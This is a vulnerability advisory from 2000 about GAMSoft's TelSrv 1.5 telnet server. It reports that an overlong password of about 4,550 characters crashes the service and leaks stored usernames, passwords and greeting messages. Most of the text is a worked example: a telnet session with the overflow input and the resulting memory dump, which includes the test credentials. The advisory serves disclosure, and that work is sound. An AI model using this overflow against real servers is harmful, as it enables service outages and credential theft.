SecurityvulnsSECURITYVULNS:DOC:492TelSrv Reveals Usernames & Passwords After DoS Attack
Details
Application: GAMSoft's TelSrv 1.5 (could be more… I don't have time to
check, nor do I have the other programs)
Problem Type: Denial of Service Attack - Reveals User Names & Passwords
Author: Patrick Webster (mailto:[email protected])
Platform: Win95 (could be more again… unable to test)
Risk Factor: High
Credibility: Patrick Webster (mailto:[email protected])
Vendor Status: Contacted, but no reply.
Vendor Website: http://www.gamsoft.com
Discovered: 20th July, 2000 (Australian)
Reported: 28th July, 2000 (Australian)
Introduction
*Note: This is my first report, so forgive me if I make any mistakes /
errors etc…
I first discovered this problem when trying to perform the Denial of Service
attack on TelSrv 1.5 which was reported not long ago. I had downloaded
TelSrv on 28 August 1999, and after playing around with it, decided I didn't
need it, thus uninstalling it and forgetting about it. When I received the
DoS report, I remembered I still had the installation, and decided to give
it a go. What was odd, was that when I did it, TelSrv didn't crash, it was
working fine, prompting me for the password. I decided to try sending the
4550 characters as the password, and when I did, TelSrv crashed, sending
back a bunch of unimportant characters. At first I thought these characters
were worthless, until I noticed the message "Welcome Admin!" which was the
message to be displayed upon login by user 'admin'. I then figured that if
it displays the admin login message, it may very well display other hidden
details. I setup another account to test for this - Username: 22222,
Password: 11111. I did the crash again, and to my surprise, there, in the
bunch of junk characters, was the numbers 22222 & 11111! I tried this again,
using different names, such as a1b2c3 and when I tried the crash again, it
displayed what looked like encrypted characters (eg. ?1u2д3, not accurate
though). With this in mind, I decided that I would find the encrypted values
of each character, by creating account names such as ABCabc123!@# an so on,
and writing a program to decrypt this.
I created a text file, which was to contain the encrypted version of the
character and a decrypted version, and while I was using 'cut & paste' to
transfer the encrypted character to the text file, I noticed that the
character had now changed to its real form. The character had changed due to
the difference in DOS characters to Windows characters (??bit - 32bit?), the
DOS characters being shown in telnet & Notepad, whereas the Windows symbols
being shown in Wordpad. This explains why the numbers were the same compared
to the letters which were different. So basically, all you have to do is use
the DoS attack, using 4550 characters (maybe less?) and copy the data which
is forced back, viewing it with Wordpad or the like, and simply looking
through the data for any recognisable words etc. One username always seems
to be displayed after the files path, so that is a start.
Exploit
The problem is bad bounds checking, so that when you connect to the TelSrv
Telnet Server and use 4550 characters as a password, the telnet service
crashes, responding to the client with data containing TelSrv usernames,
passwords & custom login messages. This data can then be used to login to
TelSrv. The only problem is that it crashes the server upon execution.
Start Example:
*Note: For this example, I have created only one account, details are as
follows…
Username: 11111username11111
Password: 22222password22222
Custom Message: This is the custom greeting message!
If you look towards the end of the following code, you will see that
'11111username11111, 22222password22222 & This is the custom greeting
message!' are displayed. They are displayed normally because of the
formatting of this document.
Please Wait…Connection Accepted (TelSrv 1.5)
This copy of TelSrv is not registered. Registration will remove this
message and the 5 second delay…
Username : (none, just hit enter)
Password :
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
*********************************************AdjustTokenPriveleges Failed :
%lu
AdjustTokenPriveleges Failed : %lu (%s)
LookupPrivilegeValue Failed : %lu
LookupPrivilegeValue Failed : %lu (%s)
SeShutdownPrivilegeOpenProcessToken Failed : %lu
OpenProcessToken Failed : %lu (%s)
Requesting shutdown priveleges…
Unknown command
Goodbye!
exitError : No priveleges for that operation
dosshutdownShutdown failed! If your host system is Windows NT,
this process does not have priveleges to shut down the system.
Shutting down…
reboothelpPassword :
Error : User database version does not match program version.Note : User
database will be converted to new version of TelSrv.Could not save user
database.No users are defined. Nobody can log in to the
server.S.EXE""%s".DAT.HLPGAMSoftC:\TELSRV.LOG.LOG\LOGIN.WAV\LOGOUT.WAVяяCTel
srvDlgWhatWhenWhoTelSrv (0 Connections)TelSrv (%d Connections)Number of
connections : %dAre you sure you want to terminate TelSrv?Cant access log
file!!Server%-25s%-25s%s
%d/%d/%d %d:%02d:%02dLogging in…%d.%d.%d.%dPlease Wait…Logged in as
"%s"Login as "%s" failedConnection terminatedFailed to stop the
server.Warning! There are active connection(s). If you stop the server now,
these connections will be terminated.
Are you sure you want to stop the server?Failed to start the server. This
can be caused by several problems :
TCP/IP is not installed on this system.
The port number is invalid.
The port number is already in use by another application.Server
ConfigurationDеI_xC§/Уќк¶ТЂkZЁ§Ш ¦@Lа@J_?µ@xCXчeюяѕДs)А75@Pxѕщ @н)eЃ°
xШ S xЂ
xр SC:\PROGRAM FILES\TELSRV\TELSRV.DAT"C:\PROGRAM
FILES\TELSRV\TELSRVS.EXE"11111username11111)kЦл,©!»п__LьмѕФнQEM™%ЋQeS\3м?T§"
НLж9!s‹РЎZPc'2ШцЁйщЂr@ЌnyмЎ+r6'g¶v5кЭу1N рП
522222password22222Й°№К-ЫьАмЄ
ГОCA‚o1Дsьeќuќ/Х·›пODыд/УЭ]b‡О"}FпT‰Ђl7Ш }[мВ73?щ!yђ5Ц™ЏЪФћgЁ+Ф~тvOЭAoИЗїgХ
h+каЗ>‡UThis is the custom greeting
message!!?І9фD5ТЖуґмСЏЦHўІ4-СUM5GґБ$‰T/Ґ·Оa)Ђ"ьЃЌО{z$LYт«a¤ж2Ч]^
™ЌcТgќ‚ФU:=9ЋMYrЭhVЫI„dwе.M7Т+·J·Цсp"maзЗБхнмЩЧк
вО°й‚KЈ"b/#йШІє»в@цMфyґ2Р
‹:‰8њ""Ґ5MЋ‰°;ъ>ИдwхdлйLM'7Њі'МаU8Ъ%X™€пэџСКънНЌU§(ЄЌ‰:?
ир¬ьВK5ІЧ¬{t§ъЊфdRУ№µД«$/уdТ†bX_Д/;-vXоНґ0@
иЛa¦›ґууcҐђUвПРНњ
±oa Bљ$'%§ЮQnGЖџжёoD„љЋ%Y\ћ9ј' z™Uј·Ф'€.'жЎ;
Ј‡:^РпkЙРзНM]G-…BЬx‰тG&ЮSцІ…n¶DdьЋ>_¤t-Я}Ьu'лdдЅ$Ьr&PYгТДЖ<РЮ„Сaaaaaaaaaaaa
aaaaaaaaaaa¦иАQA-NDкчNџьC?ђiеМ|!(ј1j#™-В<зЋxѕЙЊY5!UўOТ{Щщ-W]h~ЙBѕM^oWМ'І
м›"тІф±њdъв{uхU*1LО$©бzМи}іgшerbyйв"жОwҐSд-іѕQћ§{]V®5ЎЁcЪС?%f-иєQќ5ґyFќ 8тўъџ№hqCA~(-дЎГ (\ёW:ќ%®!Ќ]ХЌ(ЭФ)б8,Fe€‚‹цI-7O?$:јхўmГh]ЩXЂ#ћ " WAћy§5±9по!Щчв>J-&®Т«Њ·Ы4h6Ц»З М†,]_b¬Хn-utv+ЪCі&тй!O Аdм9)±L)5xPЈ1„ Ф(‡?]VїI\ak·/AЅ/wЪ<6К/е 7·e‚Z§ШцTу ]ІѕЃуЮIy‚W)?ЬЋ ЏУ&ЙЫЊс }Э |ЮэґРЇм УПМ фbх¦…Н'Хк"vѕD№»…$$SЉ8‡¶3№Ћу…}ъШjе
БЛу±Ђ·/xЎіјтgаЛ6¬ёLџbМїwйЁЙ1¦cНьj-ЃbЪ-EАгgT
УіHJђљ7ы:щЁ'г(шё}cРз"ТKЌ-Q-8ЗҐЎN4џъ/C"кg-ѕd-И{УUб±&ђЭлL[»‚mГУ3НбЕ(
End Example.
Notes
Some odd things I noticed are things such as that TelSrv did NOT crash everytime I performed the
operation. I also noticed that it did not always display the full username, password or whatever you're
looking for. Sometimes it didn't even respond with any information, just another login prompt. I noticed
that when using Windows95's default telnet application, (telnet.exe), that the information containing the
usernames etc. did not convert the usernames to their original form, whereas SecureCRT did correctly
display the data, which was what I used for this. There are quite possibly many more interesting things
people may come across, people may even wish to look into this further, maybe even figure out where the
exact location of the different usernames & passwords occur (if there is any formatting in the data) or
maybe there is something else valuable in the data (other than revealing the remote path of the server, in
this case C:\PROGRAM FILES\TELSRV\).
Credibility
This was discovered by myself (Patrick Webster) around the 20th July 2000 (maybe a day or two earlier),
not long after the known DoS attack was released. I acknowledge tha
t I am using the method discovered by someone else in a DoS attack, but I am
yet to receive a report of the DoS attack (being used on the password
prompt) which actually reveals the usernames & passwords of TelSrv, so I
believe none else has discovered it yet :)
Greetings
Greets go out to my girlfriend Jo, ZeroX, AkirA, NEO, Blockhead, Lozza,
Chatalade and anyone else I missed…
-Pothead
Contact Information
If I really need to be contacted, you can reach me at either…
mailto:[email protected] (preferred)
or
mailto:[email protected]
Cheers from Australia :) & sorry for the length of this message.
-Patrick Webster